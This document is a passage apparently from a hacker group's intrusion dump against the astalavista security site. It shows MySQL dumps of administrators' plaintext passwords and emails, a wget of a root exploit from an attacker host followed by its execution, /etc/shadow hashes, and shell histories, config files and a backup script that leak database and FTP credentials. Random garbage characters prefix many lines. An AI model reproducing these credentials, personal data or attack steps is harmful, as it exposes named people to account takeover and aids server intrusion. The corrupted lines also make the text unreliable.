5 Z# g$ V. h0 j2 H| links_votes                       |
| log                               |
| news_categories                   |
, m4 o( ~) u! P/ O0 ]| news_comments                     |
| news_emoticons                    |
$ ^" L4 G" I1 ~1 u' v7 I$ C$ i# j| news_latest                       |
9 h  p- n# i: J. o( d| news_messages                     |
- u- d* A3 c. `4 }. r2 R8 Q" R9 Y$ r| news_statistics                   |
| news_votes                        |
| prices_content                    |
4 }6 f9 j! F4 o# `" k0 p5 h4 X| prices_offers                     |
, B- R$ M  Q8 J5 q0 l! I/ P8 _: x: q| rss_settings                      |
| sessions                          |
| stats_signups                     |
| u2u2                              |
+ ^7 S$ U6 R- m8 S| u2u_contact                       |
| u2u_settings                      |
- v+ p. @- P: V: F/ @| user_keywords_selected_categories |
6 K; O, k3 c7 \' q5 `+ c| users                             |
3 e% M" r" s4 z/ v| users_ipn_test                    |
0 w+ C! _4 s! A# q9 ?! w| users_keyword_values              |
! B; N  I0 P6 T* x4 [& m$ e| users_profile                     |
5 v1 l: a) f" w+ ^| users_temp                        |
1 p  C8 I- w  n. o, ~5 \! |7 ^| users_upgrade                     |
% {$ o5 Y* X7 g" f! o. N* G+———————————–+
8 G6 z/ b6 d* H5 z  C, ?46 rows in set (0.00 sec)

( o) c4 L0 X/ ^2 N1 h6 ^9 R, {" r# wmysql> describe users;
( [1 k* t5 @! y8 y* B% c1 ^+————————–+————————————–+——+—–+———————+—————-+
| Field                    | Type                                 | Null | Key | Default             | Extra          |
+————————–+————————————–+——+—–+———————+—————-+
| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
| user                     | varchar(50)                          | NO   |     |                     |                |
| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
| password                 | varchar(30)                          | NO   |     |                     |                |
| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |
, i0 ?2 y0 ]0 }$ K| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |
| email                    | varchar(50)                          | NO   |     |                     |                |
| ip                       | varchar(15)                          | NO   |     | 0                   |                |
% q$ W* P6 U+ I0 {: I| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |
| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
$ j+ a) u6 \5 j/ B5 |3 ^% }& a| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |
| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |
4 F- u  Z( ?0 l4 X& j( T$ Y" u| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |
% H. ]1 l2 D+ w( \) A8 K| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |
| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |
* V. Z/ g$ _% ^1 y  T| lang                     | tinytext                             | NO   |     |                     |                |
| adid                     | smallint(6)                          | NO   |     | 0                   |                |
  J- W7 h2 k; k; x7 I# t| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |
+ S" ?4 R# T& I. z+ B5 v) c| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |
: s8 p% q3 R: a+————————–+————————————–+——+—–+———————+—————-+
9 @' n' d+ q+ A, l3 Y+ q22 rows in set (0.01 sec)

& \5 j- s* D0 I$ Y# Q2 O+ omysql> select count(*) as skids from users;
+——-+
| skids |
5 H3 D3 @9 a8 O, L8 j+——-+
| 25199 |
" l' i; h! q8 _+——-+
1 row in set (0.00 sec)
* k  @0 l- ?! N/ r; z
mysql> select user,nickname,password,email from users where userlevel = 1;
+————————–+———————-+——————+———————————–+
+ `, p( ~5 E/ j! H| user                     | nickname             | password         | email                             |
. {! z+ I( r( h# v  o2 H- n% Q! _+————————–+———————-+——————+———————————–+
| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |
| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |
# ^. X+ x" U( ^, O| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |
| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |
3 s& ~7 |2 s/ _6 Q| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |
" c/ v0 q) \  C| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |
. T- V/ [2 R' |0 E* k: U| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |
/ Q3 J: g3 F: `7 A6 Z| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |
| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |
( M& K2 `- H1 F6 n$ a; C| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |
| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |
& Z" e6 `# M7 d( m( I/ n| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |
| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |
% Y/ w9 V* \# N| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |
& i& U# N1 k8 s. l  a3 k, R3 {| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |
| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |
| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |
" }* @/ k# Q% s# o$ k) Q" n& m| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |
+ e* u" p" o8 i+ P| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |
! M1 y. f5 x. P/ a; J0 A  T8 P| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |
5 {+ b  p% B, d, z8 Q2 y' s' M| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |
2 H% w; {& q9 Z| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |
; `3 D' |% Q. ~9 H# m0 g* m| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |
| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |
) R5 S+ I' ~2 p| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |
6 h7 C# m1 t& B* Y, _| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |
7 N9 E+ Q. K. v2 n; x0 O) \+————————–+———————-+——————+———————————–+
# ^% q! ]% B, O$ M5 E27 rows in set (0.00 sec)
! p7 I) Z$ D# e  R. o
mysql> exit;
3 H& \8 q% n( O% i6 V/ tBye
* q) ]) N5 J; x" F
[~] plaintext passwords? yes,
Those so called “security professionals” who charge you $6.66 / month to
register at their hack-proof portal, save your passwords in plaintext…
3 H# r: X1 I3 |2 x! }7 }% Kbrilliant!

[~] This been fun but we want more.

sh-3.2$ uname -a
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
+ M" A) i! l, ^. w  p  Ksh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]
* b% C" C  Q# L% F* V1 EResolving anti.sec.labs… 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
7 x+ H3 u% r8 FHTTP request sent, awaiting response… 200 OK
) _8 `. f" A/ W, k3 Z* Q4 }( E, GLength: 18200 (18K) [text/plain]
Saving to: `g0troot’

100%[=========================================================================================================================================>] 18,200      58.6K/s   in
0.3s

18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
" Y* E/ N. i6 k. j' N2 h! m* N" q
7 q, T0 e5 D3 o" J, |5 e9 q" \sh-3.2$ ./g0troot -i x86_64
[+] g0troot - anti.sec.labs
% ~7 ~" n* x0 r1 C[+] Target: 2.6.18-128.1.10.el5
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

[+] r00tr00t
% ]) v( F. D, k7 Y& U$ l[~] Executing shell…

sh-3.2# id
# i1 n& B9 ^- e, Y" d" e  muid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
$ ]5 F' |! T3 ^# b+ c& v
sh-3.2# cat /etc/shadow
& b8 L/ U8 I/ u% Froot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
( n/ i$ l+ ^. n' ]$ |7 r[snip]
  d; i+ S) s8 A4 O7 h: Fadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
) `- Q4 F! T- p- `) S1 I2 u' E: tjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
# a; K% V* k% d" vcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
. e+ H4 i( I  Q' c' r2 ~- Q" k
sh-3.2# cat /etc/motd
7 g) M0 t. q  [5 v, p#####################################################
5 K2 D2 t( v% R; k#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
+ l7 \& `& [  w  S  m# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
5 {0 G$ ?3 w: L9 U# V#                                                   #
9 G7 k3 B- i( x5 Z#####################################################
7 A# e- e7 F: P+ h3 ?#                                                   #
" W# y& U5 Y7 w2 ?# Admin Contact - 链接标记support@secureservertech.com      #
; l" z0 [& J; Q) `* [0 ?#                                                   #
# Available ShortCuts                               #
#                                                   #
# nst -  list active connections                    #
# ddos - shows how many times each ip is connected  #
/ n9 R0 q) g! \% c  B# ltr -  restart the webserver                      #
* L2 N& Q8 i- r1 n) t0 j# phpc - edit the php config file                   #
# htc -  edit the webserver configuration file      #
7 y# k5 V4 a4 `& Z# up -   uptime                                     #
# etd - edit the motd of the day file               #
# htr - start and restart apache if needed          #
# syng - shows active SYN_RECV connections          #
4 h4 X* Q9 }: V) R9 ?/ P! c: _3 z6 ]# synd - syn flood blocker - “synd -h” for usage    #
#####################################################
, ^3 r  Z, o+ v2 S6 m# NOTES:                                            #
# Last Upgrade - 12-08-2008 by JF                   #
. i! \0 K( D  u- R- S0 b7 I% i. ~# My.cnf/Mysql Optimization - 1-28-09               #
#                                                   #
#                                                   #
# \/ z8 K- _: l; l/ [5 ?#                                                   #
#####################################################
0 X3 a6 Z3 ]2 K  i6 g* @' {; g
sh-3.2# lastlog | grep -v Never
- e3 b# [4 q* F5 u9 b! H6 @5 oUsername         Port     From             Latest
root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009
admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008
& l) R. y$ u6 n" Pcom              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
% h1 D% H& F6 Iastanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009

- F  j$ U0 }( K- W$ X9 \: ush-3.2# ls -la
/ L1 m: }2 O8 Y# `) M( \total 453376
drwxr-x— 15 root root       4096 Jun  4 08:40 .
9 y1 _! j% h& o- ?, B; j5 s) odrwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
; _) c5 G+ }6 _# l) t: a, E-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip
8 x* j8 `# t1 P7 `; `-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
. _& ?& E  F0 ?0 O) Q-rw——-  1 root root      16836 Jun  4 07:21 .bash_history
-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout
-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile
5 E  C" F! w+ ?-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc
& I5 x! M1 e( K# O9 u1 |; u-rwx——  1 root root       1899 Oct 28  2007 bk.sh
-rw-r–r–  1 root root       1327 Nov 29  2007 cert
-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql
drwxr-xr-x  4 root root       4096 May 20  2008 .cpan
/ x9 Q) L0 h" ?" R( P-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc
-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql
" H. ^  A; [- U; N8 \drwx——  2 root root       4096 Oct 28  2007 .elinks
' w' S$ i; f4 C+ g: m5 odrwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2
" ~7 M( r' A4 a. g-rw——-  1 root root          0 Apr 16 13:19 .history
/ j9 a; T0 _. \0 u-rw-r–r–  1 root root      16095 Sep 11  2007 install.log
: `- ?7 `1 e4 z! c7 ]-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog
2 m% j: k- M( I2 ]9 N; Y% V-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh
-rw——-  1 root root         35 Jun  2 14:23 .lesshst
drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp
drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
8 I6 r; C3 ]3 h8 o4 P, F7 D-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
: n/ f, r* x  g. n1 }0 U-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2
) ]- Q" j  @) c- f-rwx——  1 root root        760 Sep 18  2008 lp
drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1
6 W" d2 I) P7 C( W) n% A+ R% l-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
- m2 ], c  d6 O/ d# A' l% ]-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
; J! H  H4 |" C; e' J% l9 a7 Rdrwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
' `8 J, Z9 u1 B  j-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
2 ~0 q. q! E; h-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh
-rw——-  1 root root         41 Oct 19  2007 .my.cnf
, G; Z5 }( F! i. [1 e9 ^-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history
2 }( c# [. R  y* B. z  u2 S; p+ d-rwx——  1 root root      38873 Apr 16  2008 mysqlreport
9 T4 _6 I# S& b# o0 u-rw——-  1 root root         41 May 20  2008 .mytop
, E  k% d+ [: d4 N7 ldrwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
  T6 [( W/ U$ _drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp
0 v3 k6 A* K+ ]0 T8 d  u-rw——-  1 root root       1462 Sep 21  2007 opt.php
-rw-r–r–  1 root root       3371 Sep 22  2007 p
-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2
-rw——-  1 root root       1024 Feb  3 21:32 .rnd
-rw-r–r–  1 root root        716 Nov 28  2007 server.csr
2 o' s$ h3 F; Q; i-rw-r–r–  1 root root        887 Nov 28  2007 server.key
drwx——  2 root root       4096 Oct 10  2008 .ssh
-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
/ @2 L8 T" s% A! p" _% Z, b1 @0 r. ~-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc
-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip
  a/ m' U- W5 _. K-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1
drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
: |3 ]! A$ P; e  G, c  ?% c-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh
( `% m! {# A. z" h" g; b, ~drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
- t  m7 y! k( f! ~! ?( E-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
-rw——-  1 root root      12997 May 16  2008 .viminfo

sh-3.2# cat .bash_history
5 c7 i4 F2 C; n[snip]
wget cp4sst.com/sstlinux.tar.gz
" s6 i8 E' R7 }! qtar zxvf sstlinux.tar.gz
% O) H4 b3 S/ G' Xcd linux-2.6.27.10
; s; R* T4 v; n$ g! Esh install.sh
make bzImage ; make modules ; make modules_install ; make install
make clean
service mysqld restart
[snip]
cd /usr/sbin/
chmod 4777 traceroute
chmod 4777 ping
traceroute -I 链接标记[url]www.astalavista.ch[/url]
' t* S& Z$ e; w, p$ Q7 T, ][snip]
vi /etc/csf/csf.conf
traceroute google.ch
service csf restart
tracert google.ch
9 E5 q& x, K* J$ Bservice csf restart
traceroute 链接标记[url]www.google.ch[/url]
2 X. g  q( M5 Ltracert 链接标记[url]www.google.ch[/url]
traceroute 链接标记[url]www.google.ch[/url]
1 s( E0 g; c& c/ u# j3 Q  D* @6 ~locate traceroute
chown 4755 /bin/traceroute
  \5 i/ F3 ?$ Y: M1 y' \3 ?/ ]chown 4777 /bin/traceroute
2 \' i; a! m% d, m2 ^1 klocate ping
" R, }! c1 W/ r( `' E& Ichown 4755 /bin/ping
/ z1 L% ?; j. T2 uchown 4777 /bin/ping
cd /bin/
ls -ali | grep ping
chown root ping
chmod 4755 ping
* m0 B7 Z. W( m; W# e/ als -ali | grep traceroute
chown root traceroute
" `1 u1 P2 s! Q! h( K9 Kchmod 4755 traceroute
# J! u' W' x3 N4 m- C4 q1 Qls -ali | grep traceroute
* D: s' N& \' w8 Wtraceroute -I 链接标记[url]www.google.ch[/url]
traceroute 链接标记[url]www.google.ch[/url]
whois pmsantos.ch
- m; V4 L" Z' b5 S+ ~# }[snip]
& L) Y2 s$ O; N, J4 d0 p  Vmysql -h com_contrexx2_live < /root/defaultp_ports.sql
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
) z) G+ h5 e) h" \% u3 I8 kmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
* L$ j" i+ d: pmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
# r& G  i- Q  A9 j- Ytop
ping ssth.ch
ping asdlkfaljgasd???ljg???lasj.ch
ping asdlkfaljgasdlasj.ch
# F9 o7 j* c/ k& L  {3 ?: kping 链接标记[url]www.ssth.ch[/url]
- z# a$ c* D2 G$ y9 ~, T; ]' tping ssth.ch
nslookup 链接标记[url]www.google.ch[/url]
nslookup 链接标记[url]www.ssth.ch[/url]
man nslookup
ping 链接标记[url]www.google.ch[/url]
nslookup 链接标记[url]www.google.ch[/url]
nslookup 链接标记[url]www.google.ch[/url]
nslookup salfjasdlf.ch
7 ?4 z+ t# d0 _! ^8 U, p[snip]
openssl passwd -1 sadf
5 P0 e" o* b8 Z5 R% hopenssl passwd -1 5cZNHstdTy
4 ]2 v. k8 S+ O+ cmysql
mysql
5 ~' z6 h- @8 i, G2 B, h, V( Alocate proftp
vi /etc/proftpd.passwd
service proftpd restart
locate proftpd.conf
vi /etc/proftpd.conf
9 S0 j1 [: ^$ y: d* B  J& \0 cvi /etc/proftpd.passwd
service proftpd restart
1 J9 y+ l: ~6 q2 u[snip]
/bin/sh /home/com/backup_system/backup.sh
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
8 F0 _- k5 m1 O" K  y* W& v# imysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
, L6 J3 ~4 ]6 s4 ^' N' M5 _mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
ls -ali
4 ~" g5 h; q- l7 [- }5 y. Amysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
2 ^8 ~5 S/ m- O$ f: V& Lmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
9 N% _) ]( w! r6 ycrontab -l
7 z0 I2 H. z" K1 L3 {6 vcrontab -l
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
. ?3 `! c  Z! w6 Z2 }/home/com/public_html/modifications/cronjobs/exploits.sh
- B  x  G$ l0 A# r: ywget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
# E% S" T3 n6 w2 @; Ttar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
# q: `0 u' S1 M* [* N/ ?cd lsws-4.0.3
( X1 _' V5 i& l& l' f- gsh install.sh
uptime
hdparm -tt /dev/sda
iostat
yum install iostat
/ ~" {) t$ j" Q" r$ ]5 y. ]8 C4 A/ K! ziostat
7 [1 ^: O0 w/ ?) Z- p) [- Dwhereis iostat
( r$ h9 s3 i0 s7 e$ f' C8 I5 tyjm clean all
yum clean all ; yum -y update
6 F& _, I, r; _7 B3 }iostat
3 Q: F- l; J0 C. e* S& Y. U7 K5 Kyum install systat
rpm -qa | grep iostat
rpm -qa | grep sysstat
rpm -qa | grep systat
0 |7 Z8 @  @7 R+ ]dmesg -c
, {& S8 E; V0 Y& ksysctl -p
uname -r
cd /usr/src
, [. a' L8 e! W7 f+ `7 Iwget nix101.com/kernels/sstlinux.tar.gz
9 V  H3 P6 @- b4 x2 Yshutdown -r now
) X* A3 f: b* F; ?: znano -w /boot/grub/grub.conf

sh-3.2# cat .my.cnf
[client]
( `4 ^  O1 |' L, V% ]" Puser=da_admin
password=X9dctmRH
' y" I8 K. n% q. ]6 P! n
sh-3.2# cat /home/com/backup_system/backup.sh
: C& @2 p) K/ y5 P3 W; |: n% ~1 ?#!/bin/sh
8 F" p7 N: p  Q& O7 p* d7 F. }7 k#####################################################################
* d' s2 R3 D/ Y+ s; k& @4 l#                                                                   #
#   incremental backup for astalavista.com                          #
! m, |0 a+ u$ v2 m6 y#                                                                   #
#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #
#                                                                   #
#####################################################################
, X8 F2 T- w9 H+ e[snip]
7 a0 _9 _" o1 {PROG_DIR=”/home/com/backup_system”;
BACKUP_DIR=”/home/com/backups”;
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
# ftp for synology backup server
5 q1 o- P7 q2 }FTP_HOST=”212.254.194.163″;
FTP_PORT=”21″;
' W! O2 R# t1 ?0 y- ?. UFTP_USER=”astalavista.com”;
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
FTP_DIR=”/astalavista.com”;
; Q) J) z/ a5 W& D# database
DB_HOST=”localhost”;
2 @# D0 w. }% |% [. oDB_USER=”contrexxuser2″;
DB_PASS=”0fEYNZgXz1pKe”;
1 d$ _& [4 w# mDB_DATABASE1=”com_contrexx2_live”;
DB_DATABASE2=”com_contrexx2″;
[snip]
ftp -in $FTP_HOST $FTP_PORT <<EOF
quote USER $FTP_USER
quote PASS $FTP_PASS
  t; H# h9 m  r8 ?cd $FTP_DIR
put $DB_FULLNAME-SQL_Dump.tar
put $BACKUP_FULLNAME-Public_HTML.tar
1 \' K0 l/ n3 L- u/ t2 a/ x8 F! Wclose
& a7 K7 {$ }$ }% T6 L) Cbye
EOF

$ h) Q6 ^8 R! s3 S& B! `sh-3.2# cd /home
3 @- n6 b! F6 t* e6 ?: t: Wsh-3.2# ls -la
total 120
0 u7 B  R: A8 p2 ?8 O5 W+ Qdrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
2 L# w; D/ x* B) Y. {% ?drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
- y; |2 u5 \' ?$ \: rdrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
5 E5 k0 X. A, v; |/ s( y1 Q-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
+ _# t1 \3 g& X# a2 v0 j+ Xdrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
drwx–x–x 10 com     com      4096 Apr 28 12:40 com
9 W! ?9 r) q, B9 R4 Y6 _/ Edrwxr-xr-x  2 root    root     4096 May 17  2007 ftp
7 l# g# A5 h5 B' Edrwx——  3 jon     jon      4096 Sep 21  2007 jon
drwx——  2 root    root    16384 Sep 11  2007 lost+found
, b2 P' B: d8 e* S% _drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
/ Y" ?8 w! y  K6 Tdrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
drwx——  2 jon     jon      4096 Sep 15  2007 test
: Z1 z* }! p1 P' `drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
0 f% \' B, u. L/ d& @9 K1 J
2 s) ]/ A; h! Q: w4 b# jsh-3.2# cd admin
/ A- t" S4 a- S  y+ k; p3 |sh-3.2# ls -la
total 1735896
drwx–x–x  9 admin admin       4096 Nov 28  2007 .
$ p- m1 x! y& edrwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups
; u% S7 j/ ~$ V2 M) jdrwx——  2 admin admin       4096 Sep 28  2007 backups
-rw——-  1 admin admin        860 Sep 17  2008 .bash_history
-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout
) w* i6 o2 W3 _  K1 S. O5 p, Y-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile
4 b+ \0 O- J8 s; H-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc
drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups
7 T! I8 A+ g5 Y3 Q" tdrwx–x–x  6 admin admin       4096 Sep 21  2007 domains
) j6 j' A5 W, P) mdrwxrwx—  3 admin mail        4096 Sep 21  2007 imap
' p# I2 T  q/ w' G$ f-rw-r–r–  1 root  root          24 Sep 21  2007 info.php
! l6 v, i* V1 kdrwx——  2 admin admin       4096 Sep 21  2007 mail
-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr
-rw-r–r–  1 root  root         887 Nov 28  2007 server.key
-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow
-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz
drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups

sh-3.2# ..
sh-3.2# cd jon
. J) q) ~) Z- q4 z1 K; zsh-3.2# ls -la
total 36
drwx——  3 jon  jon  4096 Sep 21  2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history
9 ]8 {9 d+ S* ^- o-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout
-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile
; C* A5 L+ O# g" d-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc
- O7 m  D- h0 m-rw-r–r–  1 root root   24 Sep 21  2007 info.php
drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html
8 p$ T' V5 c2 J8 A6 p
sh-3.2# cd ..
1 }! N2 f4 S+ y; n  Qsh-3.2# cd test
6 ~  V7 d1 u. v- @: @5 k+ csh-3.2# ls -la
( ]- x; h, p) a5 B* {* Ftotal 48
3 z$ l2 |1 I$ R3 ^& D# }drwx——  2 jon  jon  4096 Sep 15  2007 .
1 U9 }$ z  S9 W$ f! n3 v( o6 Edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
. [0 w9 i# z, T. h-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history
/ d2 d; {) K8 u-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout
-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile
& E2 k7 _- `! R2 f% R-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc
+ p5 c$ E: K) Rsh-3.2# cat .bash_history
/usr/bin/mysqladmin -u root password PoliuJhytg67
- V3 L0 Y) E4 o5 R+ p9 G9 a: R
+ Z4 j: g' n1 Q& ]3 _sh-3.2# cd ..
sh-3.2# cd astanet
sh-3.2# ls -la
total 52
drwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
; z$ c9 I! S# e2 d* T& ]* L) Ddrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
( Y) r. O1 A2 ^, G( ]- ~) @-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
